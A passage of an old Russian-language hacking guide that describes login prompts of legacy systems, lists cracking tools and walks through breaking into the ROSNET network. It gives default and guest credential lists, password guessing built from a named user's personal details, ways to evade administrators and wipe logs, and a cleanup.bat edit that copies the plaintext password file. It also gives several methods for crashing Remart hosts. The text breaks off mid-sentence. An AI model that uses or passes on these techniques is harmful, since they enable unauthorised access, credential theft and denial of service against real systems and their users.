Серия DEC-10/20 весьма дружественна к хакерам, позволяя ввести несколько важных команд без какой-либо регистрации в системе. Отчетность находится в формате [xxx, yyy], где xxx и yyy - целые числа. Вы можете получить листинг отчетности и имен процесса каждого на системе перед регистрацией при помощи команды .systat (для системного состояния). Если учетная запись читается как [234, 1001] BOB JOINS, то можно попробовать набрать BOB или JOINS или эти два слова вместе для пароля на этой учетной записи. Чтобы войти вы печатаете:
.login xxx, yyy
и затем, после запроса набираете пароль.
Система позволит вам неограниченные попытки проникновения и не сохранит отчеты о неудачных попыток входа в систему. Также она сообщит вам, если UIC, который вы пробуете (UIC - код идентификации пользователя) не правилен.
UNIX.
Имеется множество различных машин на которых установлен UNIX.
В то время как некоторые могли бы доказать, что это не лучшая операционная система в мире, она наиболее широко используема. Система UNIX будет обычно выдавать подсказку наподобие
login:
в строчных буквах. UNIX также даст вам неограниченные попытки при регистрации (в большинстве случаев), и не имеется обычно никакого журнала, сохраняющего неудачные попытки.
Prime.
Компьютеры фирмы Prime, как правило, используют операционную систему Primos. Ее очень просто определить по надписи:
Primecon 18.23.05
или чего-то подобного, в зависимости от версии операционной системы. Обычно система не будет предлагать никакой подсказки. Там, где появилась эта надпись, наберите
login
Если это версия до 18.00.00 Primos, вы можете нажимать связку ^C для пароля. К сожалению, большинство людей использует версии 19+. Primos также располагает хорошим набором справочных файлов. Одна из наиболее полезных особенностей Prime на Telnet - устройство NETLINK. Как только вы - внутри, напечатайте "NETLINK", и следуйте указанием справки. Это позволит соединяться с NUA'S во всем мире используя команду "nc".
Например, чтобы соединиться с NUA 026245890040004, вы должны набрать
@nc: 026245890040004
в подсказке netlink.
HP-x000.
Эта система сделана Hewlett-Packard. Их характерная подсказка ":".
HEWETT-PACKARD имеет одну из более сложных последовательностей входа в систему извне - вы набираете:
HELLO SESSION
NAME, USERNAME, ACCOUNTNAME, GROUP
Некоторые из этих полей могут быть оставлены пустыми во многих случаях. Так как любые или все эти поля могут быть запаролены, это не самая простая система для проникновения, если бы не факт, что имеется обычно некоторая отчетность вокруг без паролей. Вообще, если значения по умолчанию не работают, вы будете должны применить грубую силу, используя обычный список пользователей. Hp-x000 выполняет MPE операционную систему, подсказка для нее будет ":", точно так же как подсказка входа в систему.
IRIS.
IRIS создан для Interactive Real Time Information System (интерактивная информационная система в режиме реального времени). Первоначально она выполнялась на PDP-11'S, но теперь выполняется на многих других мини ЭВМ. Вы можете определить Айрис по заголовку
Welcome to "IRIS" R9.1.4 Timesharing
и подсказке
ACCOUNT ID?
Iris позволяет неограниченные попытки при хакинге, и не сохраняет никаких журналов неудачных попыток.
VM/CMS.
VM/CMS - операционная система, выполняемая в IBM. Когда вы соединяетесь с одной из них, вы получите сообщение, наподобие
VM/370 ONLINE
затем подсказку ".". Чтобы войти, наберите:
LOGIN
NOS.
NOS созданы для Networking operation system, и выполняются на компьютере Cyber, созданном Control Data Corporation. NOS идентифицируют себя с готовностью, с заголовком
Welcome to the NOS Software System. Copyright Control Data 1978, 1987
Первая подсказка, которую вы получите, будет
Family:
В ответ нужно нажать return, тогда вы получите подсказку
user name:
Имена пользователя - типичные 7 символов буквенно-цифрового характера. Отчетность оператора начинается с цифры, типа 7ETPDOC.
Decserver.
Это не совсем компьютерная система, это скорей сетевой сервер, который имеет много различных машин, доступных с его помощью. Decserver может сказать:
Enter Username>
после первого соединения. Это только идентификатор. Напечатайте "c", поскольку это - наименее заметная вещь для ввода. Тогда вы можете получить подсказку
Local>
Наберите здесь:
c
чтобы соединиться с системой. Для получения списка системных имен, напечатайте
sh servises
или
sh nodes
Если у вас есть какие-то проблемы, встроенная подсказка доступна по команде "help". Ищите услуги по имени "modem" или "dial" или что-то подобное, они часто могут быть полезны.
GS/1.
GS/1 - другой тип сетевого сервера. В отличии от Decserver, вы не можете предсказать то, какую подсказку GS/1 шлюз собирается дать вам. Стандартная подсказка
GS/1 >
но это предназначено для системных администраторов. Чтобы тестировать GS/1, набирайте
sh d
Если появиться большой список значений по умолчанию (скорость терминала, подсказка, четность и т.д.), можно смело сказать, что вы находитесь на GS/1. Вы соединяетесь тем же самым способом как и с Decserver, печатая:
C
чтобы выяснить, что системы являются доступными, наберите
sh n
или
sh C
Все вышеупомянутое - это главные типы систем, используемые сегодня. Имеются сотни вариантов этих систем, но написанного здесь должно хватить, чтобы дать вам возможность начать.

наверх

Список программ.

Ниже приведен список программ для начинающего хакера. Эти программы не сделают из вас хакера и использование их необязательно для того, чтобы стать им. Эти инструменты (программы) помогут вам узнать много полезного и необходимого.
ToneLoc v1.10.
Эта программа является сканером. Задача этой программы просканировать местную телефонную линию на наличие модема на другом конце.
Cracker Jack v1.4.
Крекер паролей. Эта программа работает под DOS и задача ее состоит в нахождении и взломе пароля под UNIX.
Hacker's Utility v1.02.
Эта программа включает в себя множество полезных утилит. В нее входит:
 крекер паролей
 генератор паролей
 post scanner
 finger lookup
 file extractor и многое другое...
CyberKit v2.4.
В этой программе есть:
 TraceRoute
 Whols
 Finger
 Name Server Lookup
 Time Synchronizer
 Quote of the Day и многое другое...
PGP Freeware v5.0.
Эта программа предназначена для шифрования информации.
7th Sphere PortScan v1.1.
Полезный и очень быстрый сканер портов. Очень прост в установке и работе.
А теперь два главных правила:
1. Что бы стать хакером понадобится много времени. Чтобы научиться чему-нибудь есть только один путь - вы должны читать и еще раз читать. Со временем у вас будут появляться вопросы, тогда задайте их тому, кто знает, например на крэкерских и хакерских форумах.
2. Изучайте программирование, язык скриптов, а предпочтительнее языки под UNIX (C++, Perl, JavaScript и другие). Так же следует изучать OS UNIX, протоколы TCP/IP.

наверх

Вместо примера (или как ломалась сеть РОСНЕТ).

Несколько основных положений.
1. Для начала вы должны осознать, что ничего серьезного лучше не хакать (либо делать это очень осторожно), так как вас могут очень быстро найти. У администратора системы высвечивается куча всякой информации. С помощью этой информации, он легко определяет город, из которого вы вошли в Роснет, а также номер узла и номер канала, по которому вы вошли, так же возможно определить и промежуточную сеть, из которой вы вышли в Роснет. А зная город, не составит большого труда найти и абонента, который в этот промежуток времени висел на номере входа в Роснет. Можно, конечно, войти сначала в одну сеть, из нее в другую, а потом в третью и т.д., а потом в Роснет, и это бесспорно замедлит поиск, но не исключит его.
2. Заниматься своим "темным" делом вы должны с 20:00 (не ранее) до 00:00 часов местного времени. Так как в это время админы уже не работают, а следовательно не следят за системой. Но иногда админы работают круглосуточно. А выйти до 00:00 нужно потому, что Ремарт регистрирует дату последней связи, а в 00:00 вся информация обнуляется. Обнулить информацию можно и другим способом - повесив Ремарт. Так же следует помнить, что во многих системах производится закрытие хоста на ночь (обычно это период 00:00 - 03:00). Никогда не пытайтесь что-нибудь сломать днем или утром, все ваши попытки будут пресечены, а если админ сильно рассердится, то и демо-вход закроет.
3. Перед тем, как что-нибудь хакать войдите на хост под гостевым паролем (если такой имеется) и сразу же введите "/u", чтобы убедиться, что в данный момент в системе нет админа, или лиц к нему приближенных. Как только убедились, что админа нет, вводите "/r", чтобы посмотреть, насколько давно админ был в системе. Если все OK - приступайте:
4. Если вы зашли в систему, попытайтесь залезть в директорию админа системы
GO ADMIN
редко, но иногда получается, если спросят пароль - попытайтесь подобрать (хотя админы любят абсолютно "левые" крутые пароли). В директории админа есть куча файлов с наиполезнейшей информацией.
5. Пробравшись под взломанным логином в меню регистрации, ни в коем случае не меняйте пароль абонента и не переводите его деньги на другой счет. Админ это обязательно заметит, и примет меры.
6. После того, как вы лазили под чьим-то логином, обязательно перезайдите под гостевым входом n-е количество (везде по-разному) раз. Этим вы забьете информацию о входивших пользователях - "/r" будет показывать, что последние десять раз входил "гость".
7. Если вы делали что-то, что другим знать необязательно, повводите какой-нибудь макрос (примерно раз тридцать). Этим вы исключите просмотр выполнявшихся вами команд по "/e?".
Как найти выход в РОСНЕТ.
Номер телефона Роснета вы можете узнать очень просто - из списка телефонов Роснета по СНГ. Но возможно, что указанные номера телефонов уже не являются выходом в Роснет, так как их могли по какой-нибудь причине сменить. В этом случае, вы можете заняться сканингом. То есть взять скрипт или соответствующую программу и перебрать номера в городе на предмет коннекта.
Определение системы и обнаружение гостевого входа.
Для большинства хаков вам нужно иметь хотя бы минимальный доступ на хосте. Поэтому мы решили начать именно с этого. Итак, допустим у вас есть горка адресов разных хостов, что же делать дальше? Нужно проверить работоспособность этих адресов, выяснить какая система там установлена, уровень его защищенности и имеет ли этот хост гостевой вход.
И так, допустим вы зашли на какой-нибудь приглянувшийся вам хост.
Систему можно определить конечно же по приглашению.
Примеры приглашений свойственных той или иной системе:
Ремарт.
Display ANSI graphics ([Y]/N)? >
[...Какой-нибудь текст (его может и не быть)...]
UserID:
Password:
Дионис.
ENTER YOUR NAME =>
PASSWORD =>
LANGUAGE =>
REX400.
Logical Channel: 0
REX400 v4.54.02, Copyright (C) 1992-1996, Club400 Ltd.
>>
^^^^^^^
M) Mail H) Help G) GateWay Q) Quit
Multi Host>
CISCO-Маршрутизатор.
User Access Verification
Password:
Если вы обнаружите Ремарт, начинайте проверять хост на наличие гостевого входа, пробуйте следующие комбинации:
(UserID/Password):
Demo/Demo Test/Test Guest/Guest Gast/Gast Gost/Gost User/User
Demo/Guest Test/Guest Guest/Test Gast/Demo Gost/Demo User/Demo
Demo/Test Test/Demo Guest/Demo Gast/Guest Gost/Guest User/Guest
Demo/Gast Test/Gast Guest/Gast Gast/Test Gost/Test User/Test
Demo/Gost Test/Gost Guest/Gost Gast/Gost Gost/Gast User/Gast
Demo/User Test/User Guest/User Gast/User Gost/User User/Gost
Demo/New Test/New Guest/New Gast/New Gost/New User/New
Demo/Temp Test/Temp Guest/Temp Gast/Temp Gost/Temp User/Temp
New/New Temp/Temp
New/Demo New/Test New/Guest New/Gast New/Gost New/User
Temp/Demo Temp/Test Temp/Guest Temp/Gast Temp/Gost Temp/User
Перепробуйте так же все приведенные комбинации, добавляя цифры, например:
Deno1/Demo1
и т.д., потом попробуйте просто перечисленные логины без паролей. Для ускорения этого процесса используйте скрипт. В среднем за ночь один хост (при помощи скрипта) вы "проштудируете".
Если гостевого входа нет.
Если демо-вход не обнаружено, то попробуйте следующее:
UUCP/UUCP
этот пароль стоит в Ремарте по умолчанию и часто админы забывают его сменить.
UUCP/PCUU
Возможно пароль будет такой:
UUCP/UUADMIN
А может и такой.
В общем пофантазируйте, может быть что-нибудь получиться. Если это не помогло, то попробуйте следующее:
Alex/Alex Luda/Luda Boris/Boris Yura/Yura Olga/Olga Alexey/Alexey Dima/Dima Dmitry/Dmitry Nik/Nik Elena/Elena Lena/Lena и т.д.
Если ничего не получилось, то хост неплохо защищен и чтобы хакнуть его вам придется потрудиться.
Как узнать ID.
Если вы вошли в систему, попытайтесь узнать список пользователей данного хоста.
Узнать список можно, если попасть в меню "Регистрация". В этом меню можно ознакомиться с полным списком абонентов данного хоста. Если через меню вход закрыт, попробуйте так:
go reg
или
go registry
или
go onboard1
onboard - раздел регистрации.
Для того, чтобы узнать имя раздела нужно попасть в раздел MAIN (GO MAIN или через меню системы пункт "Библиотека" и вызвать дерево директорий TREE, либо TYPE LIB или TYPE LIBS или TYPE LIBTREE.
1 - номер меню "Список абонентов".
Совсем недавно был замечен глюк, в частности на 6100255 список абонентов можно было узнать, просто скачав дерево директорий, там для каждого пользователя системы был создан одноименный каталог, к сожалению, этот глюк быстро закрыли.
Если список взять не удалось, придется доставать ID другим способом. Залезьте в библиотеку и там, исходя из того, что к каждому файлу пишется имя абонента, можно получить несколько ID. Теперь если есть доступ к почте, таким же образом можно посмотреть ID авторов писем. Если этих ID вам мало, можно, орудуя /u и /r "выловить" еще 10-15 ID. Потом вызывайте паспорта найденных абонентов (/a ). "Сграбьте" их в один файл. Теперь вы располагаете достаточной информацией о пользователях - можно приступать к подбору пароля.
Подбор пароля.
Если вас не устраивают ваши полномочия, попробуйте подобрать пароль у какого-нибудь другого пользователя.
Подбор бывает трех типов:
1 - Подбор паролей по словарю (словарный метод);
2 - Перебор (подбор пароля путем перебора);
3 - Интеллектуальный подбор (подбор с использованием дополнительной информации и о пользователях.
Для первых двух способов подбора вы можете использовать скрипт, или осуществлять все действия "руками", первое, как вы понимаете, предпочтительнее. Третий способ придется осуществлять "ручками".
Ниже приводятся некоторые сведения, которые помогут вам при подборе пароля:
 Большим недостатком Ремарта является то, что большие и малые регистры не различаются.
 Логин и пароль могут совпадать.
 Пароль может быть из трех символов.
 Пароль не может превышать 8 символов.
 Неограниченное количество попыток при вводе пароля.
 Несомненно вам помогут списки пользователей хоста.
Неограниченное количество попыток при вводе пароля.
Итак, чтобы на перебор паролей затрачивалось меньше времени, то есть, чтобы вам предоставлялось неограниченное количество попыток при вводе пароля, нужно сделать следующее.
Ваш друг заходит на хост (допустим под логином Demo и паролем Demo). После того, как он зашел на хост под Demo/Demo, вы тоже начинаете пытаться зайти на этот хост под тем же логином. Вам сообщают следующее (или что-то вроде этого):
Абонент с таким логином уже работает в системе!
Если Вы не знаете, кто бы это мог быть, и если это действительно Ваш логин, то срочно обратитесь к администоатору системы за разъяснениями.
Вы можете позвонить по телефону 206-85-70 или 924-74-85.
И снова просят ввести ID и Password. Повторяете вышеуказанное три раза (используете три попытки). И после этого можете пробовать любые логины с любыми паролями бесконечное число раз!
К сожалению, как и многие другие "дыры", эту тоже кое-где прикрыли. Так что она проявляется не везде.
Интеллектуальный подбор пароля.
Итак, у вас есть несколько (или все) ID на интересующем вас хосте, так же у вас есть паспорта этих ID. Самое время приступить к интелектуалному подбору паролей.
Возьмем произвольного абонента:
Логин Фамилия/Имя Отчество/
Телефон /Фирма /Город
Ukrpack Лазарев/Андрей Михайлович/
(0482) 33-31-78/СП "ТЕЛНЕТ"/г.Одесса
Поехали:
Ukrpack/Ukrpack
Ukrpack/Kcaprku - наоборот
Ukrpack/ Andrew - имя
Ukrpack/Andy - имя
Ukrpack/Andrey - имя
Ukrpack/Fylhtq - имя (русскими буквами на английском регистре)
Ukrpack/Kfpfhtd - фамилия (русскими буквами на английском регистре)
Ukrpack/Vb[fqkjdbx - отчество (русскими буквами на английском регистре)
Ukrpack/Lam - ФИО
Ukrpack/Aml - ИОФ
Ukrpack/Mal - ОИФ
Ukrpack/Lma - ФОИ
Ukrpack/333178 - телефон
Ukrpack/Telnet - фирма
Ukrpack/Ntkytn - фирма (русскими буквами на английском регистре)
Ukrpack/Odessa - город (кстати, именно такой пароль и был)
Ukrpack/Jltccf - город (русскими буквами на английском регистре)
Так же проходимся по все остальным логинам, пять-шесть "лопухов" - это практически гарантия.
Еще кое-что о подборе паролей.
Самый лучший результат от подбора вы получите совместив все три способа. Сначала перебором перебираете варианты паролей от трех до пяти (включительно) символов. Пароли более большей длины вам врят ли удастся перебрать, так как количиство комбинаций расчитываеться по следующей формуле:
X=S№
где X - количество комбинаций, S - число символов используемых для перебора, и № - число символов в пароле. Поэтому после того, как вы перебрали все пароли в диапазоне от трех до пяти символов, вы точно знаете, что пароль состоит из шести и более символов (в противном случае вы его подобрали).
Приступайте к подбору по паспорту абонента, если все еще не удалось подобрать пароль, начинайте перебор по словарю с "плохими паролями" (типа "qwerty" и "secret") удалите из него трех, четырех и пятисимвольные пароли (так как вы их уже перебрали) и приступаете к перебору и помните - главное терпение.
Как узнать пароль абонента посредством "/U".
Также пароль можно можно узнать следующим способом:
 Зайдите на хост.
 Залогиньтесь под любым логином.
 Включите в своей "терминалке" функцию Capture. И вводите:
/u
/u
...
/u
Если вам повезет, то какой-нибудь юзер-остолоп в спешке введет вместо ID свой пароль, и он у вас благополучно зафиксируется в Сар'е.
Лучше всего вышеуказанную операцию производить при помощи скрипта.
Как узнать пароль абонента посредством "/Е ?".
Интересной возможностью Ремарта, является команда /е?. Эта команда выводит список предыдущих команд. Посмотрев их, часто можно узнать много интересного.
Кардинально новый способ взлома логика.
Имеется одна интересная особенность узла РОСНЕТ: если войти в какой-нибудь хост и наглым образом обломать связь, т.е. вырубить модем или перегрызть провода, а потом сразу после этого позвонить на узел, то оказывается, что ты опять в том-же хосте. Вот это и является основным ключом метода!
Самое главное - это дождаться пока какой-нибудь несчастный позвонит на роснетовский модем. Иногда это ожидание оказывается самым тяжким. Если-же вы все же дождались этого момента, то прежде всего надо убедиться, что это не кто-то из друзей лезет куда-то под гостем. Теперь необходимо позвонить в "Бюро ремонта ГТС" и попросить срочно проверить номер N (т.е. номер РОСНЕТ'а) и тут-же пытаться дозвониться на него. На ГТС увидят, что номер N занят и просто обломают ему коннект в качестве профилактического действия. Если вам повезло, то у того юзера, которого вы обломали, есть опция "Регистрация", а там вы можете посмотреть пароль нажатием кнопки "Z" (это для Ремарт систем).
У этого метода есть один большой недостаток: все это нужно делать в будничный день, в часы работы "Бюро ремонта ГТС", т.е. днем, когда любой нормальный хакер спит...
Как получить USRACC.DAT.
Интересной особенностью Ремарта является то, что имена и пароли юзеров хранятся в файле datusracc.dat в незашифрованном виде, а это значит, что, если "уволочь" этот файл, из него можно почерпнуть множество интересного.
Но существенной преградой является то, что обычно (если, конечно, админы не лопухи) каталог, где хранится Ремарт, не попадает в доступные разделы библиотеки. Чтобы его достать, необходимо иметь приоритет не ниже 30000 (вернее, приоритет определяется конфигурацией данного Ремарта и может быть изменен).
Чтобы "уволочь" usracc.dat можно использовать один из следующих способов.
Способ 1.
Если вы знаете полный путь к файлу usracc.dat, то забрать этот файл не составит труда (местонахождения usracc.dat часто можно выудить из файла структуры библиотеки в виде дерева).
Напишите письмо к самому себе, с аттачем в виде полного пути к useracc.dat на хосте. При совпадении определенных событий может прийти (должны быть заняты каналы!) не все, но загруженность должна быть велика. Данная "фича" на 6100255 не работает.
Способ 2.
Предположим, вы уже в Ремарте, и у вас есть надлежащий приоритет для создания раздела. Как это проверить? Войдите в библиотеку и проверьте список доступных команд, введя "?;" если в конце списка будет команда ml, вас можно поздравить.
Далее действия следующие:
1. Создайте раздел, указывающий на корень диска с: и с именем, к примеру, С:
ml /d с с:
Параметр /d указывает на то, что должен создаваться dos-раздел.
Перейдите в раздел с командой с: и получите:
С >
Затем командами cd и dir тщательно исследуйте подопытный раздел на предмет наличия там программных файлов Ремарта (они обычно размещаются в каталоге emart или emart.40, но могут быть и варианты)
Если РЕМАРТ не удалось найти в данном разделе, грохните его (раздел) командой
rl с
создайте новый раздел, указывающий на корень d:, и проделайте вышеописанную операцию с ним. Так продолжайте до умопомрачения, или пока вас не выгонит админ.
Дальше диска i: продолжать бессмысленно, поскольку РЕМАРТ в начальной своей конфигурации позволяет даунлоадать файлы только с дисков с, d. e, f, g, h, 1, но можно и попробовать...
2. Если вы нашли каталог Ремарта, полюбуйтесь на файл usracc.dat в подкаталoгe dat. He пытайтесь даунлоадать его немедленно или смотреть по type - в лучшем случае система выдаст что-то вроде "Файл занят другим пользователем", а в худшем - зависнет, и все ваши безобразия будут видны как на ладони.
3. Даунлоадните из главной директории Ремарта файл remart.bat и тщательно изучите его. Обратите внимание на ту часть, которая содержит информацию о "ночной перегенерации". Желательно скинуть и те файлы, которые пакетник грузит.
Просмотрите его на предмет команд типа pause и других - необходимо, чтобы Ремарт нормально перезагрузился, иначе, встретив команду типа pause, он будет ждать напряга клавиши на главной консоли, а Вы останетесь ни с чем.
Обычно remart.bat в процессе ночной чистки вызывает cleanup.bat, в котором содержатся команды вызова внешних модулей. В инсталляционном виде remart.bat вызывает чистку и перезапускается. Вот cleanup.bat нам-то и нужен!
Не пытайтесь исправлять remart.bat - dos в таком случае выдает ругательство batch file missing, и главная консоль зависает.
4. Просмотрите cleanup.bat командой:
type cleanup.bat
и запомните его содержимое. Теперь сделайте:
del cleanup.bat
если у вас на это есть соответствующие права - и заново его наберите:
type cleanup.bat
Наберите строки, которые ранее там были; в конец (или начало) этого файла вставьте строку вида:
сору С:PFMART.40DATUSRACC.DAT С:
Вместо remart.40 вставьте имя соответствующей директории, подправьте имена дисков, чтобы можно было найти файл, и чтобы его копию можно было впоследствии слить.
5. Теперь самое время перезапустить РЕМАРТ. Узнайте, кто работает в системе, и, если это левые юзера, ненавязчиво отключите их. Лучше всего это сделать командой hangup, поскольку если юзер видит у себя "ноу карриер", он списывает это на недостатки нашей с вами связи, а если РЕМАРТ ему выдаст что-то типа "Сейчас будет вежливый останов системы", он может призадуматься.
После того, как в системе не останется юзеров (делать это надо быстро), запустите перегенерацию командой cleanup из функций администратора и закончите свой сеанс.
6. РЕМАРТ выйдет, пакетник remart.bat запустит соответствующие проги, cleanup.bat (если Вы ничего не перепутали) и запустит опять Ремарт.
Ну а вы в то время должны терпеливо звонить и ждать. Желательно войти в систему первым (на всякий случай).
7. Теперь очень просто. Оттуда, куда вы указали копирование usracc.dat, даунлоадните его, удалите командой del (не со своего винта!..) и бегите опять в каталог Ремарта. Там восстановите cleanup.bat.
8. Напоследок грохните созданный вами раздел командой:
rl имя_раздела
9. Можно грохнуть и аудит-файл...
Получение полномочий администратора.
Чтобы получить права администратора, имеется очень старый и древний способ.
Договариваетесь со своим другом о том, что в одну и ту же секунду (!) вместе лезете на один и тот же хост. И оба вводите admin/admin, одному из вас система скажет, что пароль не верный, другой зайдет в систему под admin'oM. Главное все это делать одновременно.
Как повесить хост РЕМАРТА.
Повесить хост можно одним из следующих способов:
Способ 1.
Зайдите на какой-нибудь хост. На вопрос системы: "Display ANSI Graphics ([Y]/N)? >", введите "@". На некоторых хостах сразу же вешается. На некоторых появляется две строки:
Login:
Password:
Теперь резко начинайте вводить всякую лабуду, не забывая жать Enter. Через некоторое время (10-20 сек.) хост повиснет.
Надо заметить, что на многих хостах этот метод не проходит, ввиду самодеятельности админа. То есть, обычно для устранения этой "дыры", символ "@" заменяют каким-нибудь другим. Так же нужно помнить, что хост будет висеть не долго (5-6 мин.).
Способ 2.
Зайдите на какой-нибудь хост. Залогиньтесь под любым существующим логином. Введите "/е" (Редактор команд), и начинайте вводить лабуду, в данном способе Enter жать не надо! Вскоре после заполнения строки, курсор сам перейдет на следующую, повторите это три раза (заполните три строки). После заполнения третьей строки хост повиснет. Для использования этого приема нужна тренировка, так что не огорчайтесь, если сначала у вас не будет ничего получаться. Самый лучший вариант, это поставить у себя Ремарт и потренироваться.
Способ 3.
Зайдите на какой-нибудь хост. Залогиньтесь под логином, имеющем доступ к меню регистрации. Зайдите в меню регистрации и введите левую команду (например, dir). Ремарт виснет.
Способ 4.
Зайдите на какой-нибудь хост. Залогиньтесь под любым существующим логином. Позовите какого-нибудь абонента на чат: "/с " и быстро "бегите" - "GO EMAIL". Если на вас попадут в момент перехода, то хост повиснет.
Способ очень "дубовый", п

Хакурство книги хакерства як стать хакером взлом почти